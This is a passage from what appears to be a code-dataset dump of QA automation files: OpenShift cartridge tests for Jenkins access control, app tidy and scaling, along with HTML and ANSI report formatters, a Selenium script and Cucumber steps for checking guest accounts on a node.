"#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nJune 12, 2012\n\n[US1941][runtime][rhc-cartridge]A user not logged in jenkins can not see the build and workspace existed in jenkins [P1]\nhttps://tcms.engineering.redhat.com/case/138302/\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n \n def initialize(self):\n try:\n self.test_variant = common.get_variant()\n except:\n self.info(\"Test variant is not specified. Using 'php' as default...\")\n self.test_variant = \"php\"\n \n self.app_name = self.test_variant.split('-')[0] + common.getRandomString()\n common.env_setup() \n\n\n def finalize(self):\n if self.test_variant in ( \"jbossas\", \"jbosseap\" ):\n if self.config.options.run_mode==\"DEV\":\n common.change_node_profile(\"small\")\n \n\nclass JenkinsAndUserNotLoggedIn(OpenShiftTest):\n def test_method(self):\n self.info(\"=====================\")\n self.info(\"Creating a Jenkins application\")\n self.info(\"=====================\")\n common.create_app(\"jenkins\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo = False)\n \n self.info(\"=====================\")\n self.info(\"Creating an application\")\n self.info(\"=====================\")\n common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo = False)\n \n if self.test_variant in ( \"jbossas\", \"jbosseap\" ):\n if self.config.options.run_mode==\"DEV\":\n common.change_node_profile(\"medium\")\n \n self.info(\"=====================\")\n self.info(\"Embedding Jenkins client\")\n self.info(\"=====================\")\n common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n \n self.info(\"=====================\")\n self.info(\"Checking Jenkins URLs\")\n self.info(\"=====================\")\n for url in ( OSConf.default.conf[\"apps\"][\"jenkins\"][\"url\"], OSConf.default.conf[\"apps\"][self.app_name][\"embed\"][common.cartridge_types[\"jenkins\"]][\"url\"] ):\n ret_code = common.grep_web_page(\n url,\n [ \"Authentication required\", r\"window.location.replace\\('/login\" ],\n \"-L -k -H 'Pragma: no-cache'\",\n 30, 5 \n )\n self.assert_equal(ret_code, 0, \"Login form must be shown\")\n \n \n return self.passed(\"[US1941][runtime][rhc-cartridge]A user not logged in jenkins can not see the build and workspace existed in jenkins [P1]\")\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsAndUserNotLoggedIn)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5497929453849792, "alphanum_fraction": 0.5588641166687012, "avg_line_length": 34.20833206176758, "blob_id": "a9d1c299913cf09cde0acaa55989f14d7931db82", "content_id": "689905e4433a948cb1b717e809ae6c965281dc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5071, "license_type": "no_license", "max_line_length": 218, "num_lines": 144, "path": "/automation/open/testmodules/RT/cartridge/disk_space_cleanup.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 23, 2012\n\n[US1107][rhc-cartridge] Disk space cleanup using rhc app tidy\nhttps://tcms.engineering.redhat.com/case/122527/\n\"\"\"\n\nimport os\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1107][rhc-cartridge] Disk space cleanup using rhc app tidy\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `jbossea` as default\")\n self.test_variant = 'jbosseap'\n\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.cart = common.type_to_cart(self.app_type)\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\n\nclass DiskSpaceCleanup(OpenShiftTest):\n\n def test_method(self):\n self.info(self.summary)\n\n self.add_step(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step(\n \"Visiting the application's URL (to generate access.log file)\",\n common.check_web_page_output,\n function_parameters = [ self.app_name, 'health', '1' ],\n expect_description = 'The application must be alive',\n expect_return = 0)\n\n self.add_step(\n \"Running command 'tidy' and checking the result\",\n self.tidy_and_comparation,\n function_parameters = [ self.app_name],\n expect_description = \"Temporary files must be successfully created and disappeared after running 'tidy'\",\n expect_return = 1) # It's a Python function\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def tidy_and_comparation(self, app_name):\n \"\"\"\n This functions returns 1 if the comperation was successfull ( new_size < original_size)\n Returns 0 otherwise\n \"\"\"\n # Step 1: Getting the original repo size\n original_size = common.get_git_repo_size(app_name)\n\n # Step 2: Creating temporary files, the name is a random string\n files = list()\n random_name = common.getRandomString()\n\n files.append(r\"/tmp/%s.txt\" % ( random_name ))\n files.append(r\"${OPENSHIFT_GEAR_DIR}/tmp/%s.txt\" % ( random_name ))\n\n if self.test_variant == 'jbosseap':\n files.append(r\"${OPENSHIFT_%s_LOG_DIR}/%s.txt\" % ( self.cart, random_name ))\n\n elif self.test_variant in (\"ruby\",\"rack\"):\n files.append(r\"${OPENSHIFT_REPO_DIR}/tmp/%s.txt\" % ( random_name ))\n\n ( ret_code, ret_output ) = common.run_remote_cmd(app_name, \n \"set -x && \" + ' && '.join(map(( lambda x: \"touch \" + x), files)))\n if ret_code != 0:\n print \"Failed to create temporary file\"\n return 0\n\n # Step 3: Running command 'tidy'\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc app tidy %s -l %s -p '%s' %s \" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n if ret_code != 0:\n print \"Failed to run command 'tidy'\"\n return 0\n \n # Step 4: Checking Git repo size\n new_size = common.get_git_repo_size(app_name)\n\n if int(new_size) < int(original_size):\n print \"OK. Git repo size is smaller\"\n else:\n print \"Git repo size must be smaller\"\n return 0\n\n # Step 5: Checking the existence of the temporary files\n ( ret_code, ret_output ) = common.run_remote_cmd(\n app_name,\n \"set -x && \" + ' && '.join(map(( lambda x: 'test ! -f %s' + x ), files))\n )\n if ret_code != 0:\n print \"Existing temporary files after running the command 'tidy'...\"\n return 0\n\n # Step 6: Checking access log files\n (ret_code, ret_output) = common.run_remote_cmd(app_name, r\"test \\! -f ${OPENSHIFT_%s_LOG_DIR}access.log*\" % (self.cart))\n if ret_code != 0:\n print \"Existing access.log file in OPENSHIFT_%s_LOG_DIR\" % (self.cart)\n return 0\n\n # Otherwise everything is OK\n return 1\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DiskSpaceCleanup)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5664275884628296, "alphanum_fraction": 0.5794057250022888, "avg_line_length": 21.875, "blob_id": "0926f9b76e34accc0bc1e6d64364fe66226c8ba8", "content_id": "db7b9bc36f0909cd2dc146f73fcd4bcc119a3f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 97, "num_lines": 256, "path": "/automation/open/lib/reports/Html.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nReport object that creats XHTML format reports. \n\n\"\"\"\n\nimport sys\nimport reports\n\nimport XML.XHTML as XHTML\n\ndef escape(s):\n\ts = s.replace(\"&\", \"&amp;\") # Must be first\n\ts = s.replace(\"<\", \"&lt;\")\n\ts = s.replace(\">\", \"&gt;\")\n\ts = s.replace('\"', \"&quot;\")\n\treturn s\n\nclass HTMLFormatter(reports.NullFormatter):\n\tMIMETYPE = \"text/html\"\n\t_MSGTYPESUB = {\n\t\t\"PASSED\":'<font color=\"green\">PASSED</font>',\n\t\t\"FAILED\":'<font color=\"red\">FAILED</font>',\n\t\t\"ERROR\":'<font color=\"red\">ERROR</font>',\n\t\t\"COMPLETED\":'<font color=\"green\">COMPLETED</font>',\n\t\t\"INCOMPLETE\":'<font color=\"yellow\">INCOMPLETE</font>',\n\t\t\"ABORTED\":'<font color=\"yellow\">ABORTED</font>',\n\t\t\"INFO\":\"INFO\",\n\t\t\"DIAGNOSTIC\":'<font color=\"brown\">DIAGNOSTIC</font>',\n\t}\n\n\tdef title(self, title):\n\t\ts = [\"<br><h1>\"]\n\t\ts.append(escape(title))\n\t\ts.append(\"</h1>\\n\")\n\t\treturn \"\".join(s)\n\n\tdef heading(self, text, level=1):\n\t\ts = []\n\t\ts.append(\"\\n<h%s>\" % (level,))\n\t\ts.append(escape(text))\n\t\ts.append(\"</h%s>\\n\" % (level,))\n\t\treturn \"\".join(s)\n\n\tdef paragraph(self, text):\n\t\treturn \"<p>%s</p>\\n\" % (escape(text),)\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsg = str(msg)\n\t\tmsgtype = self._MSGTYPESUB.get(msgtype, msgtype)\n\t\tif msg.find(\"\\n\") > 0:\n\t\t\treturn \"%s: <pre>%s</pre><br>\\n\" % (msgtype, escape(msg))\n\t\telse:\n\t\t\treturn '<font face=\"courier\" size=\"-1\">%s: %s</font><br>\\n' % (msgtype, escape(msg))\n\n\tdef text(self, text):\n\t\treturn \"<pre>\\n%s\\n</pre>\\n\" % (text,)\n\n\tdef url(self, text, url):\n\t\treturn '<a href=\"%s\">%s</a>\\n' % (url, text)\n\n\tdef summary(self, text):\n\t\tsum = \"<pre>\\n%s\\n</pre>\\n\" % (text,)\n\t\treturn sum.replace(\"PASSED\", self._MSGTYPESUB[\"PASSED\"])\n\tdef section(self):\n\t\treturn \"<hr>\\n\"\n\n\tdef page(self):\n\t\treturn \"<br><hr><br>\\n\"\n\n\tdef initialize(self):\n\t\treturn \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Final//EN\">\n<html>\n <head>\n\t<title>Test Results</title>\n </head>\n<body>\n\"\"\"\n\tdef finalize(self):\n\t\treturn \"\\n</body>\\n</html>\\n\"\n\n\n\nclass XHTMLFormatter(reports.NullFormatter):\n\tMIMETYPE = \"text/html\"\n\t_MSGTYPESUB = {\n\t\t\"PASSED\": '<span class=\"passed\">PASSED</span>',\n\t\t\"FAILED\": '<span class=\"failed\">FAILED</span>',\n\t\t\"COMPLETED\": '<span class=\"completed\">COMPLETED</span>',\n\t\t\"ERROR\": '<span class=\"error\">ERROR</span>',\n\t\t\"INCOMPLETE\": '<span class=\"incomplete\">INCOMPLETE</span>',\n\t\t\"ABORTED\": '<span class=\"aborted\">ABORTED</span>',\n\t\t\"INFO\": '<span class=\"info\">INFO</span>',\n\t\t\"DIAGNOSTIC\": '<span class=\"diagnostic\">DIAGNOSTIC</span>',\n\t}\n\n\tdef initialize(self):\n\t\treturn \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"xhtml1-strict.dtd\">\n<html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <title>Test Results</title>\n <style type=\"text/css\">\nbody {background: white; color: black;\n margin: .25in; border: 0; padding: 0;\n font:13px/1.45 sans-serif; \n}\na:link {\n background-color: transparent;\n}\na:visited\t{\n background-color: transparent;\n}\na:active\t{\n background-color: transparent;\n}\na:hover {\n background-color: transparent;\n text-decoration:underline;\n}\nimg {\n border:0;\n}\nh1, h2, h3, h4, h5, h6 {\n font-family: Arial, sans-serif;\n color: #333;\n background: transparent;\n margin-bottom:0;\n padding:0;\n}\nh1 {\n font-size: 135%;\n padding: 0;\n padding-top: 10px;\n margin-bottom: 0;\n}\nh2 {\n font-size:\t115%;\n text-decoration: underline;\n padding: 0;\n padding-bottom: 10px;\n margin-bottom: 0;\n margin-left: .5in;\n}\nh3, h4, h5 {\n font-size: 1.0em;\n}\np {\n margin: 0;\n padding: 0;\n margin-left: .5in;\n font-family: monospace;\n}\n\nspan.passed {\n color: green;\n font-weight: bold;\n}\nspan.failed {\n color: red;\n font-weight: bold;\n}\nspan.completed {\n color: green;\n font-weight: bold;\n}\nspan.incomplete {\n color: yellow;\n}\nspan.aborted {\n color: yellow;\n}\nspan.diagnostic {\n}\nspan.error {\n color: red;\n font-weight: bold;\n}\nspan.info {\n}\n\n </style>\n </head>\n <body>\n\"\"\"\n\n\tdef finalize(self):\n\t\treturn \"\\n </body>\\n</html>\\n\"\n\n\tdef page(self):\n\t\treturn \"<br><hr><br>\\n\"\n\n\tdef title(self, title):\n\t\ts = [\"<h1>\"]\n\t\ts.append(escape(title))\n\t\ts.append(\"</h1>\\n\")\n\t\treturn \"\".join(s)\n\n\tdef heading(self, text, level=1):\n\t\ts = []\n\t\ts.append(\"\\n<h%s>\" % (level,))\n\t\ts.append(escape(text))\n\t\ts.append(\"</h%s>\\n\" % (level,))\n\t\treturn \"\".join(s)\n\n\tdef paragraph(self, text):\n\t\treturn \"<p>%s</p>\\n\" % (escape(text),)\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsg = str(msg)\n\t\tmsgtype = self._MSGTYPESUB.get(msgtype, msgtype)\n\t\tif msg.find('\\n') > 0:\n if msgtype.find('ERROR') > 0:\n return \"<p><span class=\\\"error\\\">%s:\\n<code>%s</code>\\n</span></p>\" % (msgtype, \\\n msg.replace('\\n', '<br/>'))\n else:\n return \"<p>%s:\\n<code>%s</code>\\n</p>\" % (msgtype, \\\n msg.replace('\\n', '<br/>'))\n \n\t\telse:\n if msgtype.find('ERROR') > 0:\n return \"<p><span class=\\\"error\\\">%s: %s</span></p>\\n\" % (msgtype, escape(msg))\n\n else:\n return '<p>%s: %s</p>\\n' % (msgtype, escape(msg))\n\n\tdef text(self, text):\n\t\treturn \"<pre>%s</pre>\\n\" % (text,)\n\n\tdef url(self, text, url):\n\t\treturn '<p>%s: <a href=\"%s\">%s</a></p>\\n' % (text, url, url)\n\n\tdef summary(self, text):\n\t\tsum = \"<pre>%s</pre>\\n\" % (text,)\n\t\tsum = sum.replace(\"PASSED\", self._MSGTYPESUB[\"PASSED\"])\n\t\tsum = sum.replace(\"FAILED\", self._MSGTYPESUB[\"FAILED\"])\n\t\treturn sum\n\tdef section(self):\n\t\treturn \"<hr>\\n\"\n\n\n\nif __name__ == \"__main__\":\n\treport = reports.get_report((None, \"-\", \"text/html\",))\n\treport.initialize()\n\treport.info(\"Some self test info.\")\n\treport.passed(\"yippee!\")\n report.error(\"ERROR\\n2nd line\\n\")\n\treport.finalize()\n\n# End of file\n" }, { "alpha_fraction": 0.6629213690757751, "alphanum_fraction": 0.6741573214530945, "avg_line_length": 21.885713577270508, "blob_id": "3faa68849114e53ca0921c225673796acc5a3cba", "content_id": "90e1ad52ebaee34940d613185632db056652d843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", "max_line_length": 64, "num_lines": 35, "path": "/automation/seleniumjsexe/seleniumjsexe.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\ntesturl = 'file://' + PROJECT_ROOT + '/test.html'\n\ndriver = webdriver.Firefox()\ndriver.get(testurl)\n\njs1 = '''\nvar title = document.title;\nalert(\"The page of title is: \" + title);\n'''\njs2 = '''\n$(\"#m1\").show(\"slow\");\n'''\njq_path = 'jquery183.js'\njq_file = open(jq_path)\njq = jq_file.read()\njq_file.close()\n\n# ===== using native js =====\n#title = driver.execute_script(js1)\n\n# ===== using jquery =====\n#driver.execute_script(jq)\n#driver.execute_script(js2)\n\n# ===== handle mouseover using selenium api =====\n#hover_element = driver.find_element_by_id(\"l1\")\n#hover = ActionChains(driver).move_to_element(hover_element)\n#hover.perform()\n" }, { "alpha_fraction": 0.5583863854408264, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 30.399999618530273, "blob_id": "82955ac729c8ed21a88d7fc022c8a4711c9c2861", "content_id": "783feef4386e21437e29be160b35bc0a936dcff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 68, "num_lines": 15, "path": "/automation/listenertest/PleaseWaitWithArg.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\n \n \nclass PleaseWaitWithArg():\n ROBOT_LISTENER_API_VERSION = 2\n \n def __init__(self, test_name = ''):\n self.test_name = test_name\n \n def start_test(self, name, attributes):\n if (name == self.test_name) or ('' == self.test_name):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"About to start test '%s'\" % name)\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.651462972164154, "avg_line_length": 21.764705657958984, "blob_id": "a8590045d4e1752f850339657eddbf070a48481d", "content_id": "7faeeb30ccfc13eecb04d2c3796ab282ef26a03e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 68, "num_lines": 51, "path": "/automation/open/lib/reports/ANSI.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nA standard formatter enhanced to support ANSI terminal color output.\n\n\"\"\"\n\nimport reports\n\nRESET = \"\\x1b[0m\"\nRED = \"\\x1b[31;01m\"\nYELLOW = \"\\x1b[33;01m\"\nGREEN = \"\\x1b[32;01m\"\nBLUE = \"\\x1b[34;01m\"\nWHITE = \"\\x1b[01m\"\n\n\nclass ANSIFormatter(reports.StandardFormatter):\n\tMIMETYPE = \"text/ansi\"\n\t_TRANSLATE = {\n\t\t\"PASSED\":GREEN+'PASSED'+RESET,\n\t\t\"FAILED\":RED+'FAILED'+RESET,\n\t\t\"ABORTED\":YELLOW+'ABORTED'+RESET,\n\t\t\"INCOMPLETE\":YELLOW+'INCOMPLETE'+RESET,\n\t\t\"ABORT\":YELLOW+'ABORT'+RESET,\n\t\t\"INFO\":\"INFO\",\n\t\t\"DIAGNOSTIC\":WHITE+'DIAGNOSTIC'+RESET,\n\t}\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsgtype = self._TRANSLATE.get(msgtype, msgtype)\n\t\treturn \"%s%s: %s\\n\" % (\" \"*(level-1), msgtype, msg)\n\n\tdef summary(self, text):\n\t\ttext = text.replace(\"PASSED\", self._TRANSLATE[\"PASSED\"])\n\t\ttext = text.replace(\"FAILED\", self._TRANSLATE[\"FAILED\"])\n\t\ttext = text.replace(\"INCOMPLETE\", self._TRANSLATE[\"INCOMPLETE\"])\n\t\ttext = text.replace(\"ABORTED\", self._TRANSLATE[\"ABORTED\"])\n\t\treturn text\n\n\ndef _test(argv):\n\tpass # XXX\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.567549467086792, "alphanum_fraction": 0.5853167772293091, "avg_line_length": 28.534652709960938, "blob_id": "0f069a5b28a13143edfed5c74f4d6100166a4a4c", "content_id": "9eaae09e2ee6fb63dc9fd0cca745d53f3326b01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 5966, "license_type": "no_license", "max_line_length": 99, "num_lines": 202, "path": "/automation/open/testmodules/RT/cucumber/step_definitions/node_steps.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# \n# \n# Steps that can be used to check applications installed on a server (node)\n#\n#require 'etc'\n\nrequire 'openshift'\nrequire 'resolv'\ninclude OpenShift\n\n# Controller cartridge command paths\n$cartridge_root = '/usr/libexec/li/cartridges'\n$controller_config_path = \"cdk-app-create\"\n$controller_config_format = \"#{$controller_config_path} -c '%s'\"\n$controller_deconfig_path = \"cdk-app-destroy\"\n$controller_deconfig_format = \"#{$controller_deconfig_path} -c '%s'\"\n$home_root = \"/var/lib/libra\"\n# --------------------------------------------------------------------------\n# Account Checks\n# --------------------------------------------------------------------------\n# These must run after server_steps.rb: I create a <name> app for <framework>\n\n# These depend on test data of this form:\n# And the following test data\n# | accountname \n# | 00112233445566778899aabbccdde000\n\n\n# Convert a unix UID to a hex string suitable for use as a tc(1m) class value\ndef netclass uid\n \"%04x\" % uid\nend\n\n# copied from server-common/openshift/user.rb 20110630\ndef gen_small_uuid()\n # Put config option for rhlogin here so we can ignore uuid for dev environments\n %x[/usr/bin/uuidgen].gsub('-', '').strip\nend\n\nGiven /^a new guest account$/ do\n # generate a random account name and use the stock SSH keys\n # generate a random UUID and use the stock keys\n acctname = gen_small_uuid\n @account = {\n 'accountname' => acctname,\n }\n command = $controller_config_format % [acctname]\n puts \"******\", command\n run command\n puts \"&&&&&&\", command\n # get and store the account UID's by name\n @account['uid'] = Etc.getpwnam(acctname).uid\nend\n\nGiven /^the guest account has no application installed$/ do\n # Assume this is true\nend\n\nWhen /^I create a guest account$/ do\n # call /usr/libexec/li/cartridges @table.hashes.each do |row|\n # generate a random account name and use the stock SSH keys\n # generate a random UUID and use the stock keys\n acctname = gen_small_uuid\n @account = {\n 'accountname' => acctname,\n }\n command = $controller_config_format % [acctname]\n run command\n # get and store the account UID's by name\n @account['uid'] = Etc.getpwnam(acctname).uid\nend\n\nWhen /^I delete the guest account$/ do\n # call /usr/libexec/li/cartridges @table.hashes.each do |row|\n \n command = $controller_deconfig_format % [@account['accountname']]\n run command\nend\n\nWhen /^I create a new namespace$/ do\n ec = run(\"#{$rhc_domain_script} create -n vuvuzuzufukuns -l vuvuzuzufuku -p fakepw -d\")\nend\n\nWhen /^I delete the namespace$/ do\n ec = run(\"#{$rhc_domain_script} destroy -n vuvuzuzufukuns -l vuvuzuzufuku -p fakepw -d\")\n # FIXME: Need to fix this test to work w/ mongo -- need unique name per run.\n #ec.should be == 0\nend\n\nThen /^a namespace should get deleted$/ do\n ec = run(\"host vuvuzuzufukuns.dev.rhcloud.com | grep \\\"not found\\\"\")\n #ec.should be == 0\nend\n\nThen /^an account password entry should( not)? exist$/ do |negate|\n # use @app['uuid'] for account name\n \n begin\n @pwent = Etc.getpwnam @account['accountname']\n rescue\n nil\n end\n\n if negate\n @pwent.should be_nil \n else\n @pwent.should_not be_nil\n end\nend\n\nThen /^an account PAM limits file should( not)? exist$/ do |negate|\n limits_dir = '/etc/security/limits.d'\n @pamfile = File.exists? \"#{limits_dir}/84-#{@account['accountname']}.conf\"\n\n if negate\n @pamfile.should_not be_true\n else\n @pamfile.should be_true\n end\nend\n\nThen /^an HTTP proxy config file should( not)? exist$/ do |negate|\n\nend\n\nThen /^an account cgroup directory should( not)? exist$/ do |negate|\n cgroups_dir = '/cgroup/all/libra'\n @cgdir = File.directory? \"#{cgroups_dir}/#{@account['accountname']}\"\n\n if negate\n @cgdir.should_not be_true\n else\n @cgdir.should be_true\n end\nend\n\nThen /^an account home directory should( not)? exist$/ do |negate|\n @homedir = File.directory? \"#{$home_root}/#{@account['accountname']}\"\n \n if negate\n @homedir.should_not be_true\n else\n @homedir.should be_true\n end\nend\n\nThen /^selinux labels on the account home directory should be correct$/ do\n homedir = \"#{$home_root}/#{@account['accountname']}\"\n @result = `restorecon -v -n #{homedir}`\n @result.should be == \"\" \nend\n\nThen /^disk quotas on the account home directory should be correct$/ do\n\n # EXAMPLE\n\n # no such user\n # quota: user 00112233445566778899aabbccdde001 does not exist.\n\n # no quotas on user\n # Disk quotas for user root (uid 0): none\n\n # Disk quotas for user 00112233445566778899aabbccdde000 (uid 501): \n # Filesystem blocks quota limit grace files quota limit grace\n # /dev/xvde 24 0 131072 7 0 10000 \n\n\n @result = `quota -u #{@account['accountname']}`\n \n @result.should_not match /does not exist./\n @result.should_not match /: none\\s*\\n?/\n @result.should match /Filesystem blocks quota limit grace files quota limit grace/\nend\n\n\nThen /^a traffic control entry should( not)? exist$/ do |negate|\n acctname = @account['accountname']\n tc_format = 'tc -s class show dev eth0 classid 1:%s'\n tc_command = tc_format % (netclass @account['uid'])\n @result = `#{tc_command}`\n if negate\n @result.should be == \"\"\n else\n @result.should_not be == \"\"\n end\nend\n\n# ===========================================================================\n# Generic App Checks\n# ===========================================================================\n\n# ===========================================================================\n# PHP App Checks\n# ===========================================================================\n\n# ===========================================================================\n# WSGI App Checks\n# ===========================================================================\n\n# ===========================================================================\n# Rack App Checks\n# ===========================================================================\n" }, { "alpha_fraction": 0.5584919452667236, "alphanum_fraction": 0.5690260529518127, "avg_line_length": 41.265625, "blob_id": "5ae920a3a4899f6714cd49c3005f852e78221804", "content_id": "7bfe39a9e57440d6f18b899be55bc7c0185c412f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5411, "license_type": "no_license", "max_line_length": 284, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_jenkins2scalable_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: embed_jenkins2scalable_app.py\n# Date: 2012/04/05 17:00\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport time\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2091][Runtime][rhc-cartridge]Embed jenkins client to scalable app\"\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n tcms_testcase_id = 145122\n self.steps=[]\n\n common.env_setup()\n\n def finalize(self):\n #os.system(\"rm -rf server; rhc-ctl-app -a %s -c destroy -b -l %s -p %s; rhc-ctl-app -a server -c destroy -b -l %s -p %s;\"%(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd))\n pass\n\nclass EmbedJenkins2scalableApp(OpenShiftTest):\n def test_method(self):\n\n def verify(app_name, what):\n url = OSConf.get_app_url(app_name) \n (status, output) = common.grep_web_page(url, what)\n return status\n\n self.steps.append(testcase.TestCaseStep(\"1. Create an scalable app using REST API\",\n common.create_scalable_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"2. Scale up.\",\n common.scale_up,\n function_parameters=[self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"3. Create a jenkins server app.\",\n common.create_app,\n function_parameters=['server', common.app_types['jenkins'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"4. Embed a jenkins client to scalable app.\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"5. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> </body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"6. Scale up.\",\n common.scale_up,\n function_parameters=[self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"7. Scale down.\",\n common.scale_down,\n function_parameters = [self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"8. Remove Jenkins client\",\n common.embed,\n function_parameters = [self.app_name, \"remove-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"9. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> second chance...</body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"10. Embed a jenkins client to scalable app.\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"11. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> third chance...</body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"12. Make some changes to the app.\",\n verify,\n function_parameters = [self.app_name, 'third'],\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedJenkins2scalableApp)\n return 